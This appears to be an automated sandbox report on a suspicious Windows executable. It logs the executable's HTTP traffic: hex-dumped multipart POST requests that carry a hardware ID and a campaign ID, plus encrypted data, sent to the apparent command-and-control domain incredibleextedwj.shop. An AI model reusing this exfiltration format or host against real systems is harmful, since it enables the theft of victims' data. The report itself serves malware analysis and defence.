                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 573241
                                                              Host: incredibleextedwj.shop
                                                              2024-04-20 11:27:09 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 45 36 42 35 36 46 45 35 42 31 39 38 46 45 36 42 32 30 31 36 38 39 31 44 32 44 42 35 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 67 47 5a 73 72 2d 2d 4b 69 72 69 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"00E6B56FE5B198FE6B2016891D2DB500--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"jgGZsr--Kirie
                                                              2024-04-20 11:27:09 UTC15331OUTData Raw: 23 be 02 03 52 cc 09 80 6f 83 67 31 0f bf b1 f3 28 df 6c c4 e1 6f b0 38 e3 f2 ff 19 01 e4 21 15 78 e4 b7 21 b8 1f c4 19 52 73 fd 00 33 97 0f 9c 86 03 22 43 70 dc a3 b2 b5 0e 7e 33 fb 31 1b 8a 21 2b c5 bc 28 5f fa ec 5a ca ef bc a9 96 11 08 da cb b7 e7 ac f5 81 d6 b6 4b de cf e3 bc 9e 57 8b 78 7a e0 08 6d e2 cd d1 1a 0d 5c 8e 7b 4d b2 5a fe e5 1f f8 81 30 49 74 eb 7d 0a 73 91 3d f3 e5 af 6d ed 58 4a 79 9c 82 79 de 37 dc 19 cd f4 46 1f 65 d0 f9 84 1e f8 5e b9 56 49 24 8c 6d e6 bc bb 34 68 d5 b4 93 df 83 a6 9c 0c 31 49 59 be da be f8 b7 18 8e 48 50 bd 89 58 98 90 b8 ad 19 3d 6a 2a 97 d5 1f 86 c8 9b 5c be 0e b6 39 df 2d ed bf ca 57 f7 f1 e7 80 a4 a5 11 e6 c4 69 e7 5d 4f 52 51 ff a1 d8 ba 0a a5 6b 2d d4 0c 2a c5 0d fd 46 28 1f 93 e4 73 26 f1 99 d9 69 ad ab 2b
                                                              Data Ascii: #Rog1(lo8!x!Rs3"Cp~31!+(_ZKWxzm\{MZ0It}s=mXJyy7Fe^VI$m4h1IYHPX=j*\9-Wi]ORQk-*F(s&i+
                                                              2024-04-20 11:27:09 UTC15331OUTData Raw: 70 12 3e d8 4b b4 dc e1 2b bd fe ab ff f5 b7 36 55 ee 11 35 35 85 92 60 a8 38 c4 14 62 cc e6 e2 c1 b6 1d ff 6a b1 d4 ba 08 c4 20 fd 77 e4 fa fc 4b 90 34 f3 df 21 d6 b9 d9 1a de 80 46 42 02 88 53 e4 ff 6b d0 b4 54 7f 9f a8 09 44 c0 61 0c ef e4 9e dd 7d 40 7a 3f 4d 15 81 e3 eb d7 f7 c9 36 ca 24 43 d5 ab 3b eb fa e5 2a a5 c0 62 e3 0d c8 57 f4 59 fa 71 35 d1 f6 8f e8 2b d9 f7 79 7b fe 02 8a 60 5c 3d e1 e7 f1 3f 6d 05 91 75 c8 81 16 6f fd 41 90 82 cb 8c f1 e9 51 88 16 8e 0e 80 8f 2d a8 14 71 e4 d7 75 35 3c 71 57 0d 98 84 dd 84 07 9c 20 22 f8 30 15 f1 9a 54 a0 e5 91 bb b7 41 67 4b fe 14 a9 78 be 76 0d 5f 6a 92 de 93 8a 18 29 21 73 99 b0 12 b0 77 80 45 4c dc 47 f2 e6 14 30 23 90 40 f6 ea f1 64 7e fd 46 ba 04 34 a1 5d 4b 6e 50 af a3 c4 af 22 bd 6f 25 04 13 2f 29
                                                              Data Ascii: p>K+6U55`8bj wK4!FBSkTDa}@z?M6$C;*bWYq5+y{`\=?muoAQ-qu5<qW "0TAgKxv_j)!swELG0#@d~F4]KnP"o%/)
                                                              2024-04-20 11:27:09 UTC15331OUTData Raw: 26 12 87 08 b7 d0 b7 8f 93 6f e4 a6 01 ba 1a 91 4a 43 93 f9 51 bc 4a c0 03 8b 5d 3f a6 61 a9 82 77 ca 31 c1 82 a7 50 38 e2 00 d7 f0 e0 20 ce a3 44 e5 c5 2c fb a1 c9 47 1e d8 79 f2 ed 9b d7 7f e8 ba 59 ce 0f a1 47 3a 2f ce 01 e2 15 88 a8 30 94 8f 02 ae 6d 05 4f 9e c0 a5 a0 5e ff bf 53 6b 6d 2e 58 ab b7 ef d7 1b b4 ed c2 f5 eb b1 c8 3b b3 d5 be bc 66 c5 a7 dc aa bd 30 5e bc 2b f2 0b c5 59 a2 7e 96 5e 0d 01 89 38 c8 6d 72 ef ba 15 4f 80 3c 70 fe 3e 47 8a a8 c1 0d c5 95 a2 76 e5 ed d2 c3 7e 97 10 78 8d a6 77 0a 90 75 59 ea 2b 42 16 b5 a4 54 51 9c 08 78 23 aa 6e 09 32 1b 42 5c 01 61 a8 60 6e 58 4e 6c a4 5a eb 19 43 5f 48 fd 9f 88 17 87 48 2d 00 b3 88 66 c7 e9 a1 76 82 83 8b 3f dd d3 d1 eb 07 f6 ef de 88 fb 9d 50 43 e6 e7 5c 22 14 34 2d 65 fb 72 3c 9c 74 b1 84
                                                              Data Ascii: &oJCQJ]?aw1P8 D,GyYG:/0mO^Skm.X;f0^+Y~^8mrO<p>Gv~xwuY+BTQx#n2B\a`nXNlZC_HH-fv?PC\"4-er<t
                                                              2024-04-20 11:27:09 UTC15331OUTData Raw: 5f 7a 20 c1 29 04 f5 8f 60 22 be 79 44 08 65 5c c1 01 1c 02 cf 5e 09 cc ea 73 2b 02 81 d0 46 68 21 c3 1f 06 f5 43 23 23 03 e1 30 bf 75 8d 5e 7e 86 45 53 63 20 dd 9c f6 fb 04 d9 f4 e8 f1 f0 8c 08 ed 0a ae 8a 37 42 61 f5 ad 92 35 d9 2a e0 cc a4 3c 44 74 e3 5b 1e 40 e2 11 81 d2 b7 7c 4d fc 35 0c db 22 35 d7 2a 7d 6e 92 26 9a 0f 48 0a 4f 38 19 eb 73 a7 30 67 26 2f ee 5f cf 1d 52 c7 0c 07 3e 1a 1c 0e 3e b6 a0 dc 5d c4 68 d5 16 b3 d3 96 6a 5e 08 66 5c 3b 4e 16 5b 7f ad 69 3b 2c df ba 28 69 5f 1f a6 21 da 56 ce 09 e3 a6 08 0a 8c 04 61 40 30 06 c6 d8 06 fd bb 04 e8 23 0b 46 62 c0 36 9a 56 75 ae d8 29 06 13 8e 48 b7 08 d1 f7 b2 6b a6 7e 12 1a 97 2a 78 9d f3 36 1e 6d 7f 5e 80 b9 2a 7c d0 2e 54 d5 6f cb 28 d6 31 17 ef ff ad a2 f8 ff be 20 38 1b 09 8f 04 70 89 8a 8c
                                                              Data Ascii: _z )`"yDe\^s+Fh!C##0u^~ESc 7Ba5*<Dt[@|M5"5*}n&HO8s0g&/_R>>]hj^f\;N[i;,(i_!Va@0#Fb6Vu)Hk~*x6m^*|.To(1 8p
                                                              2024-04-20 11:27:09 UTC15331OUTData Raw: f0 d0 5c cc b8 75 6e 5d 04 cf 25 2c 85 ad 75 81 6e 0e 21 e1 19 c9 8f af c4 fb 22 a9 06 08 ac 91 8a 5f b7 0c 99 5f 5d d6 2d 18 43 4a 20 42 b5 9f 4f 80 18 ee e9 82 4c d2 79 18 f9 7c 17 0e 76 79 54 0f 98 a9 f8 c8 f2 76 93 83 a4 73 80 fd 7e b6 38 6b 09 a4 b6 51 2a d6 02 67 c1 69 30 e5 ae 28 06 34 af 98 52 77 c0 c6 a0 56 66 e5 c0 03 e5 bb 9b 03 ba 18 22 aa 42 4d c6 3d af 17 61 b2 29 63 ac 5b 65 67 81 fc 1f 14 30 27 6d 5a d3 46 0a da 77 1d e1 41 9b 83 12 2a 21 da 84 a1 39 0e 18 c6 c3 2d 48 60 f9 08 ee 12 05 bb cb 96 85 e9 ed c6 bd e2 a0 6c f3 f6 de 00 14 d0 60 3f d1 44 54 16 6a 15 11 a2 e7 74 4a 32 a0 be 83 e3 c5 aa e0 34 c3 fd c3 c6 fa 61 c7 c1 8d a6 0f 29 87 c7 d9 8f 2a 53 54 94 a9 59 06 7f 14 fa 8e 0e 85 f5 88 b6 1e 48 af 0f a3 50 eb 70 99 b6 3f a6 b4 da a6
                                                              Data Ascii: \un]%,un!"__]-CJ BOLy|vyTvs~8kQ*gi0(4RwVf"BM=a)c[eg0'mZFwA*!9-H`l`?DTjtJ24a)*STYHPp?
                                                              2024-04-20 11:27:09 UTC15331OUTData Raw: 55 6b f4 36 4b 2a 6e 67 7a d3 62 8b 2c fc 68 c2 05 a6 b4 61 9b 22 b8 83 92 e0 d0 dc 43 40 ba 39 35 6d f7 f4 ad cb 75 c7 15 65 ca 1b 75 35 40 37 4f 10 7e e7 31 7a 1a 4d 7f bb 31 6a 99 db df 3b c6 ff dd 16 fa a2 4e b8 ce 19 22 33 b2 02 f8 ef 99 1b f6 23 49 8b fc 7c 1f 61 fa bc 75 f8 9e 82 21 ee 5f 38 de 71 5d c0 8e 51 46 fc 84 f8 54 af 20 db 16 b0 bf cb 12 81 46 47 ee 1e 12 3f e3 30 57 9a d5 a5 86 aa a1 b4 40 7d f2 e0 d0 47 5c d2 41 2f 43 ed 1e c5 3e c7 b2 1d a1 67 64 49 7d 13 b8 f4 3a dd ce af 9c a1 f2 83 91 48 cb 31 4c d5 03 d2 73 d6 4f ab 2b 0d a4 69 5c fe 76 8d e1 11 24 93 44 61 85 7b 20 b4 9b a8 10 8a 88 02 27 06 c5 6e dd b5 18 3f 2a 72 48 fc e8 ea b3 f9 86 50 05 92 57 93 76 89 09 85 17 1a ba 7c f7 ec 67 5f c6 cc 26 6f 2d 41 61 14 2e 83 fc c3 e4 0c 67
                                                              Data Ascii: Uk6K*ngzb,ha"C@95mueu5@7O~1zM1j;N"3#I|au!_8q]QFT FG?0W@}G\A/C>gdI}:H1LsO+i\v$Da{ 'n?*rHPWv|g_&o-Aa.g
                                                              2024-04-20 11:27:09 UTC15331OUTData Raw: 30 1c 23 a3 db 7f 22 8c 5e eb fa c8 6c 27 83 28 00 ca 4b c7 cb cb 0d bc e2 00 3e 78 41 bb 3e 5c da d1 8f 33 95 71 19 10 fa fd 82 d3 dd 8c 3f eb b6 d7 b5 1b 15 af 67 a8 70 65 ce 91 f4 b7 ec 2d 17 b5 ae d2 b8 c1 1f 82 45 b7 5a b9 7c e7 d8 da 31 73 48 4a 66 a5 ca a6 3d 3b 7d d2 d6 fb 2a d0 a7 a5 1f cd 68 0d cd a7 a9 73 13 82 77 a5 4f d9 c0 71 f0 df 94 fe 6f 3d 83 37 0d 01 a1 00 ea c1 4b 1a db 70 84 83 9d bf ad 8d 7f a0 67 07 6d bc 2e 08 da 1a 3b c9 a9 62 1e dc 41 3e 96 df c5 e6 f4 1a 0b c4 28 65 0e be 97 03 5a 47 68 d7 3f a7 e5 2a b6 dc 0e d0 7e 1c fe f9 8e f1 2d 2d 30 5d 12 d5 80 a8 f4 3e 71 24 08 13 65 2d 00 6e a1 d0 bc 4b a7 9c 09 93 a2 c3 ae 52 32 bb ea f2 bd ba a5 fe 26 79 4a 8d 09 9a 94 61 20 e1 7a 03 b0 63 dc 9b fa 1d 20 4f 38 c2 5e 14 50 f3 e5 de b5
                                                              Data Ascii: 0#"^l'(K>xA>\3q?gpe-EZ|1sHJf=;}*hswOqo=7Kpgm.;bA>(eZGh?*~--0]>q$e-nKR2&yJa zc O8^P
                                                              2024-04-20 11:27:09 UTC15331OUTData Raw: 28 75 a9 40 68 ec 79 c7 aa 97 c5 1d 36 84 eb 5b 88 7b 0e 72 c7 7c 41 bd 3a a3 6f 21 66 3d 0c a6 c1 a1 17 16 c3 55 fa e0 c3 b2 2d 13 54 2a 76 d6 9f 86 0a c3 41 92 a8 f3 ab 95 3a 47 c2 64 b6 46 03 cb 06 b8 35 ba 23 89 84 8e 36 c4 a5 de 42 3f be 8b 42 20 a9 cd a4 f1 f6 ba b1 53 53 60 aa cc 9e 62 94 d9 3d 0b e1 0d 89 d5 bd d2 ef 0a 88 5e a2 c2 5a 56 7d 61 51 61 93 b8 77 e6 6d 98 23 6e 5a 57 30 e7 a1 d8 c5 2b 2e 11 c6 bc 2a fd 6e 96 5e a6 a3 b9 04 7f 6e 3f 8c f0 98 4e 8e 67 74 d7 6f d6 ee 9d e0 39 76 c5 54 18 15 4a 5d 9f 19 a2 ef 86 95 66 79 75 4a b1 65 e9 d3 6e da 19 00 47 85 99 ad 79 c3 d7 f5 26 b2 03 e2 37 ad 74 db b3 19 52 9c ab 06 d4 6b 6d 84 ae 1e b6 c7 51 ac ae c2 65 55 3d 70 49 bb 30 6d 30 59 75 9c a9 3f be 7e 26 2a 34 40 64 40 28 59 e9 c7 cc 49 13 d3
                                                              Data Ascii: (u@hy6[{r|A:o!f=U-T*vA:GdF5#6B?B SS`b=^ZV}aQawm#nZW0+.*n^n?Ngto9vTJ]fyuJenGy&7tRkmQeU=pI0m0Yu?~&*4@d@(YI
                                                              2024-04-20 11:27:09 UTC15331OUTData Raw: 3d 24 78 da 27 9a 6e 1e f2 63 bb 65 7f b2 c9 d5 ad 1f cf 84 35 c0 c9 75 3b 75 fe cf 00 c7 d5 4a 58 22 ae 90 17 e8 ac dd f6 ba 75 d7 f9 28 f5 07 12 ed 57 7b eb 5d 92 1c f8 2d 77 4a 17 f7 bc 4e 1c c2 71 55 02 aa a4 6f 7e 54 49 78 8b 21 da d6 a0 b0 83 ca bb d1 c7 f6 1a c1 8e 90 6c 15 38 5c 7f 3d 2d cc 4d a5 71 b7 09 ef e9 d1 77 9d f8 bc a8 a1 98 f9 ab 66 69 1d e2 b7 88 42 9f 1d a8 5d c9 a1 03 77 e4 36 ec af ad 7d 14 c1 73 5f d0 45 69 18 c3 43 82 4a 8a 09 96 d9 82 af 8f 6a 7d 8a 7e b3 c9 3e 52 ec 01 65 3b 79 a9 4b 7b 51 29 2e d8 b9 f1 62 e1 bb ce cd 91 bc 2c 0c c7 cd 4c 7a 1a 03 e1 e6 5c 9b b1 e3 6b 6f 6b a2 8f 60 f5 5b b9 9d 4e 06 8a 6b b5 71 a4 2a 3e 7c 62 b0 86 5e 9b d8 1c 8d 30 6c f2 37 8b e0 5d 5d 91 8f 89 ec 91 cf 0b 6b 62 f9 97 67 99 1a a3 01 79 9d 6a
                                                              Data Ascii: =$x'nce5u;uJX"u(W{]-wJNqUo~TIx!l8\=-MqwfiB]w6}s_EiCJj}~>Re;yK{Q).b,Lz\kok`[Nkq*>|b^0l7]]kbgyj
                                                              2024-04-20 11:27:13 UTC806INHTTP/1.1 200 OK
                                                              Date: Sat, 20 Apr 2024 11:27:13 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=30f30ivt3etvth2e0b42u5dnli; expires=Wed, 14-Aug-2024 05:13:50 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wvjQwg3FWcF3pMR8N4gFWdxnfBNe%2FjFDf1ZotykdsgnWBkZQ9KYgL4JEU5pwyPsxx3CTMY6vO%2FffpYNPBV2cYu%2Fwy%2BTco4cY9I6LSYxmCV2Snd2tm0CEZt7krwNVoKIeXSh2isSLHBiA"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8774c896cc8512df-ATL
                                                              alt-svc: h3=":443"; ma=86400


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Target ID:0
                                                              Start time:13:27:00
                                                              Start date:20/04/2024
                                                              Path:C:\Users\user\Desktop\RrHuyQ4GzG.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\RrHuyQ4GzG.exe"
                                                              Imagebase:0xf60000
                                                              File size:7'656'696 bytes
                                                              MD5 hash:6AC50F7457396DE4520F8220F46C7756
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              No disassembly